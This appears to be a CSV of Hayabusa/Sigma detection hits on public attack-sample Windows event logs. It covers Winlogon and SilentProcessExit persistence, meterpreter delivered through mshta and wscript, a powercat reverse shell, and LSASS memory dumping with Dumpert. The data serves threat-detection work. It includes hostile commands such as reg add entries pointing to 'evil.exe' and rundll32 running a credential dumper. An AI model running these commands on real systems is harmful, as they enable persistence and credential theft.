2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
